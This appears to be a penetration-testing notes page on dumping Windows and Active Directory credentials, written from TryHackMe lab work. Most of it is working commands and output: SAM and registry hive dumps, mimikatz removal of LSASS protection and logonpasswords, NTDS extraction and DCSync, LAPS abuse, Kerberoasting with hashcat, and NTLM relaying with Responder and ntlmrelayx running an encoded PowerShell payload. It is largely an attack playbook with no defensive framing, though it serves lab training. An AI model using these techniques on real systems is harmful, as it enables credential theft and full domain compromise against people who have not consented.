4. Dumping Credentials

Dumping SAM

SAM file typically cannot be access if Windows is running

c:\\Windows\\System32\\config\\sam

So we exploit it via

  • meterpreter

  • mimikatz

  • Volume Shadow Copy Service / Registry Hives

Meterpreter Method

meterpreter > getuid
Server username: THM\\Administrator
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3b784d80d18385cea5ab3aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:443e64439a4b7fe780db47fc06a3342d:::

Volume Shadow Copy Service / Registry Hives

C:\\Users\\Administrator>wmic shadowcopy call create Volume='C:\\'

Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{D8A11619-474F-40AE-A5A0-C2FAA1D78B85}";
};

Getting info from registry hives

C:\\Users\\Administrator\\Desktop>reg save HKLM\\sam C:\\users\\Administrator\\Desktop\\sam-reg

With either the Shadow Copy or SAM from the Registry Hive, we need to decrypt it with the key found in c:\\Windows\\System32\\Config\\system.

C:\\Users\\Administrator\\Desktop>reg save HKLM\\system C:\\users\\Administrator\\Desktop\\system-reg

Once we get both pieces of information, we move them to the attacker machine to decrypt the information

user@machine:~ python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Dumping LSASS

LSASS contains password hashes

Before dumping LSASS, we need to disable LSA Protection using mimikatz

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]

Creating a dump file via GUI

Dumping via SysinteralsSuite

c:\>c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[09:09:33] Dump 1 initiated: c:\Tools\Mimikatz\lsass_dump-1.dmp
[09:09:33] Dump 1 writing: Estimated dump file size is 162 MB.
[09:09:34] Dump 1 complete: 163 MB written in 0.4 seconds
[09:09:34] Dump count reached.

Dumping via mimikatz

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515377 (00000000:0007dd31)
Session           : RemoteInteractive from 3
User Name         : Administrator
Domain            : THM
Logon Server      : CREDS-HARVESTIN
Logon Time        : 6/3/2022 8:30:44 AM
SID               : S-1-5-21-1966530601-3185510712-10604624-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : THM
         * NTLM     : 98d3a787a80d08385cea7fb4aa2a4261
         * SHA1     : 64a137cb8178b7700e6cffa387f4240043192e72
         * DPAPI    : bc355c6ce366fdd4fd91b54260f9cf70
...

Dumping from Windows Credential Manager

vaultcmd to find any stored credentials

C:\\Users\\Administrator>vaultcmd /list
Currently loaded vaults:
        Vault: Web Credentials
        Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        Location: C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

        Vault: Windows Credentials
        Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
        Location: C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Vault

/listproperties to check if there are any stored credentials in the vault

C:\\Users\\Administrator>VaultCmd /listproperties:"Web Credentials"
Vault Properties: Web Credentials
Location: C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Number of credentials: 1
Current protection method: DPAPI

Extract out the password using Get-WebCredentials.ps1

C:\\Users\\Administrator>powershell -ex bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\\Users\\Administrator> Import-Module C:\\Tools\\Get-WebCredentials.ps1
PS C:\\Users\\Administrator> Get-WebCredentials

UserName  Resource             Password     Properties
--------  --------             --------     ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}

Using cmdkey, we can see which credentials are already stored in the session

C:\\Users\\thm>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=thm\\thm-local
    Type: Domain Password
    User: thm\\thm-local

Knowing this, we can use runas /savecred to ride on this saved credential in the session for authentication on the domain THM.red

C:\\Users\\thm>runas /savecred /user:THM.red\\thm-local cmd.exe
Attempting to start cmd.exe as user "THM.red\\thm-local" ...

Dumping credentials on the Credential Manager using mimikatz

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman

Dumping from Domain Controller

NTDS

New Technologies Directory Services (NTDS) is a database containing all Active Directory data, including objects, attributes, credentials

NTDS is located in C:\\Windows\\NTDS

Decrypting the NTDS file requires a system Boot Key which is stored in the C:\Windows\System32\config\SECURITY

In essence, we need these 3 files

  • C:\\Windows\\NTDS\\ntds.dit

  • C:\\Windows\\System32\\config\\SYSTEM

  • C:\\Windows\\System32\\config\\SECURITY

Using ntdsutil.exe, this will dump out all 3 files we need in C:\\temp

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q"

Get those files on the attacker machines, and decrypt it with impacket to get the hashes

user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local

DCSync

mimikatz > log dumpfile.txt
mimikatz > lsadump::dcsync /domain:za.tryhackme.loc /all

Now we analyze the file with grep

cat dcdump.txt | grep "SAM Username"
cat dcdump.txt | grep "Hash NTLM"

cat dcdump.txt | grep "krbtgt" -A10 # get ntlm hash of krbtgt for golden ticket forging
cat dcdump.txt | grep "<machine name>" -A10 # get ntlm hash of machine account for silver ticket forging

impacket 

user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc THM.red/<AD_Admin_User>@10.10.224.1 

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
thm.red\\thm:1114:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::

## only dumping ntlm hashes
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/<AD_Admin_User>@10.10.224.1

Local Administrator Password Solution (LAPS)

We can check if LAPS is installed by finding the admpwd.dll path

C:\\Users\\thm>dir "C:\\Program Files\\LAPS\\CSE"
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\\Program Files\\LAPS\\CSE

06/06/2022  01:01 PM              .
06/06/2022  01:01 PM              ..
05/05/2021  07:04 AM           184,232 AdmPwd.dll
               1 File(s)        184,232 bytes
               2 Dir(s)  10,306,015,232 bytes free

Find Groups that can interact with the LAPS

PS C:\\Users\\thm> Find-AdmPwdExtendedRights -Identity THMorg

ObjectDN                                      ExtendedRightHolders
--------                                      --------------------
OU=THMorg,DC=thm,DC=red                       {THM\\THMGroupReader}

Finding users in the group

PS C:\\Users\\thm> net groups "THMGroupReader"
Group name     THMGroupReader
Comment

Members

-------------------------------------------------------------------------------
bk-admin
The command completed successfully.

Once we compromise bk-admin, we can then use it to access LAPS

C:\\Users\\thm> runas /user:THM\\bk-admin cmd.exe
PS C:\\> Get-AdmPwdPassword -ComputerName creds-harvestin

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
CREDS-HARVESTIN      CN=CREDS-HARVESTIN,OU=THMorg,DC=thm,DC=red    FakePassword    2/11/2338 11:05:2...

Kerberoasting

Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS).

Using the TGS, we can attempt to brute force the password

We need the SPN (Service Principal Name) accounts such as IIS User, MSSQL, etc

user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------------  -------  --------  --------------------------  ---------  ----------
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578

Once we find the SPN user, we can send a single request to get a TGS ticket for the srv-user user using the -request-user argument.

user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm -request-user svc-user 

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------------  -------  --------  --------------------------  ---------  ----------
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc-user$THM.RED$THM.red/svc-user*$8f5de4211da1cd5715217[*REMOVED*]7bfa3680658dd9812ac061c5

After getting the TGS, we can attempt to crack it to get the password

user@machine$ hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt

NTLM Relaying

Responder

On the attacker

$ sudo responder -I tun0

On the victim, run this. Responder should get the NTLM hash of the account which you can crack or pass

PS> dir //attackerip/lol

NTMLRelayx

On the attacker

$ impacket-ntlmrelayx --no-http-server -smb2support -t <relay_target> -c "powershell -enc JABjAGwAaQBlAG4AdA..."

On the victim, run this. NTLMRelay can capture NTLMv2 which we can crack or relay to authenticate to another server and execute code

PS> dir //attackerip/lol

Other methods

Powershell history file

C:\\Users\\USER\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

Passwords in Registry

c:\\Users\\user> reg query HKLM /f password /t REG_SZ /s

C:\\Users\\user> reg query HKCU /f password /t REG_SZ /s

Unattended Windows Installations

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

Saved Credentials

You can’t see the passwords, but you can ride on them

cmdkey /list # seeing if there are saved creds in the session
runas /savecred /user:admin cmd.exe # if admin has a saved cred, we can run as him

IIS Configuration

type C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config | findstr connectionString

Software: PuTTY

reg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f "Proxy" /s
Previous3. Enumerating Active DirectoryNext5. Lateral Movement

Last updated